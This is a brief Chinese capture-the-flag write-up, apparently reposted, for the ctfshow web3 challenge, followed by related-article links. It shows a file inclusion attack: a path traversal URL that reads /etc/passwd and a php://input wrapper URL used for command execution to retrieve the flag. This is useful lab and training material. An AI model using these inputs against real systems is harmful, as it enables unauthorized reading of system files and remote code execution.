ctfshow—web—web3

Posted anweilx

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ctfshow—web—web3相关的知识,希望对你有一定的参考价值。

打开靶机

 

 

 提示是文件包含漏洞

 

 测试成功

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=../../../../../../../../../../etc/passwd

 

 此题考的是php伪协议+文件包含,实现任意命令执行

抓取数据包

https://d7c9f3d7-64d2-4110-a14b-74c61f65893c.chall.ctf.show/?url=php://input

 

 开始试验,查询当前目录下的文件结构

 

 查看ctf_go_go_go文件内容

 

成功拿到flag

以上是关于ctfshow—web—web3的主要内容,如果未能解决你的问题,请参考以下文章

ctfshow web入门 信息搜集

CTFshow刷题日记-WEB-信息收集

CTFShow代码审计

ctfshow-WEB-web12( 利用代码执行漏洞读取敏感文件)

ctfshow 做题 web 方向 web1~web10

CTFshow刷题日记-WEB-代码审计(web301-310)SQL注入SSRF打MySQLSSRF打FastCGISSRF文件读取